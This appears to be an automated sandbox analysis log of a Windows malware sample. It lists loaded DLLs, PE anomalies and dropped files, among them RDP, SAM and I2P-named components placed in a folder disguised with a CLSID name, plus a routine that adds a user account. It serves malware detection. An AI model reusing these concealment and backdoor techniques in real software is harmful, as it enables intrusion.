Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: d3d9.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: apphelp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: cryptbase.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: ntmarta.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: iphlpapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: winhttp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: windows.storage.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: wldp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: netapi32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: userenv.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: netutils.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: samcli.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: libi2p.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: cryptsp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: rsaenh.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: samlib.dll
Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exeFile written: C:\Users\user\AppData\Local\Temp\wfpblk.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: file.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: file.exeStatic file information: File size 11950592 > 1048576
Source: file.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x8b1200
Source: file.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x100200
Source: Binary string: RfxVmt.pdb source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000003.1974223599.000001FC7A526000.00000004.00000020.00020000.00000000.sdmp, rfxvmt.dll.23.dr, HwfABz7s.23.dr
Source: Binary string: RfxVmt.pdbGCTL source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000003.1974223599.000001FC7A526000.00000004.00000020.00020000.00000000.sdmp, rfxvmt.dll.23.dr, HwfABz7s.23.dr
Source: rfxvmt.dll.23.drStatic PE information: 0xE004CD23 [Sat Feb 5 03:04:03 2089 UTC]
Source: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exeCode function: 5_2_00007FF73AFBFF1F GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,5_2_00007FF73AFBFF1F
Source: file.exeStatic PE information: section name: .didata
Source: 3lp16vmh8u8y3z1y6.exe.1.drStatic PE information: section name: .xdata
Source: dx4w727xyq6q2yaxja.exe.1.drStatic PE information: section name: .xdata
Source: main.exe.12.drStatic PE information: section name: .xdata
Source: cnccli.dll.23.drStatic PE information: section name: .xdata
Source: libi2p.dll.23.drStatic PE information: section name: .xdata
Source: evtsrv.dll.23.drStatic PE information: section name: .xdata
Source: termsrv32.dll.23.drStatic PE information: section name: .xdata
Source: rdpctl.dll.23.drStatic PE information: section name: .xdata
Source: samctl.dll.23.drStatic PE information: section name: .xdata
Source: prgmgr.dll.23.drStatic PE information: section name: .xdata
Source: dwlmgr.dll.23.drStatic PE information: section name: .xdata
Source: zFE1sfMY.23.drStatic PE information: section name: .xdata
Source: zCUeqzwC.23.drStatic PE information: section name: .xdata
Source: j8fz8FfX.23.drStatic PE information: section name: .xdata
Source: kInii6kX.23.drStatic PE information: section name: .xdata
Source: Jcf8nu5c.23.drStatic PE information: section name: .xdata
Source: 9qaNW6z6.23.drStatic PE information: section name: .xdata
Source: TLN3Eh0f.23.drStatic PE information: section name: .xdata
Source: DYoNFfUY.23.drStatic PE information: section name: .xdata
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02FAF262 push es; retf 0_2_02FAF263
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02F9124F push ecx; retf 0_2_02F91252
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02F96761 push esi; ret 0_2_02F96763
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE0E17726F push qword ptr [rsi]; ret 23_2_00007FFE0E177275
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE0E17727C push rsp; ret 23_2_00007FFE0E17727D
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE0E1772BC push rsp; ret 23_2_00007FFE0E1772BD
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE0E1772B8 push rsp; ret 23_2_00007FFE0E1772B9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE0E1772E4 push rsp; ret 23_2_00007FFE0E1772E5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE0E1772E0 push rsp; ret 23_2_00007FFE0E1772E1
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE0E1772E8 push rsp; ret 23_2_00007FFE0E1772E9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE0E1772C4 push rsp; ret 23_2_00007FFE0E1772C5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE0E1772CC push rsp; ret 23_2_00007FFE0E1772CD
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE0E1772D4 push rsp; ret 23_2_00007FFE0E1772D5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE0E1772D0 push rsp; ret 23_2_00007FFE0E1772D1
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE0E1772DC push rsp; ret 23_2_00007FFE0E1772DD
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE0E1772D8 push rsp; ret 23_2_00007FFE0E1772D9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE0E1779B3 push qword ptr [00007FFE44177884h]; retf 23_2_00007FFE0E1779B9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE0E1779BB push qword ptr [00007FFE4417788Ch]; retf 23_2_00007FFE0E1779C1
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE0E1779E7 push qword ptr [00007FFE441778B8h]; retf 23_2_00007FFE0E1779ED
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE0E1779EF push qword ptr [00007FFE441778C0h]; retf 23_2_00007FFE0E1779F5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE0E1779F7 push qword ptr [00007FFE441778C8h]; retf 23_2_00007FFE0E1779FD
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE0E1779C3 push qword ptr [00007FFE44177894h]; retf 23_2_00007FFE0E1779C9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE0E1779CB push qword ptr [00007FFE4417789Ch]; retf 23_2_00007FFE0E1779D1
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE0E1779D3 push qword ptr [00007FFE441778A4h]; retf 23_2_00007FFE0E1779D9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE0E1779FF push qword ptr [00007FFE441778D0h]; retf 23_2_00007FFE0E177A05
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE0E177A07 push qword ptr [00007FFE441778D8h]; retf 23_2_00007FFE0E177A0D
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE0E177A0F push qword ptr [00007FFE441778E0h]; retf 23_2_00007FFE0E177A15
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE0E177A17 push qword ptr [00007FFE151778E8h]; retf 23_2_00007FFE0E177A1D
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE0EB50052 push rsi; iretd 23_2_00007FFE0EB50053
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE0E13870B strlen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strlen,NetUserAdd,CreateProfile,23_2_00007FFE0E13870B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\kInii6kXJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\9qaNW6z6Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\j8fz8FfXJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\Jcf8nu5cJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\HwfABz7sJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\TLN3Eh0fJump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exeJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\zFE1sfMYJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\zCUeqzwCJump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exeJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\DYoNFfUYJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\kInii6kXJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\9qaNW6z6Jump to dropped file
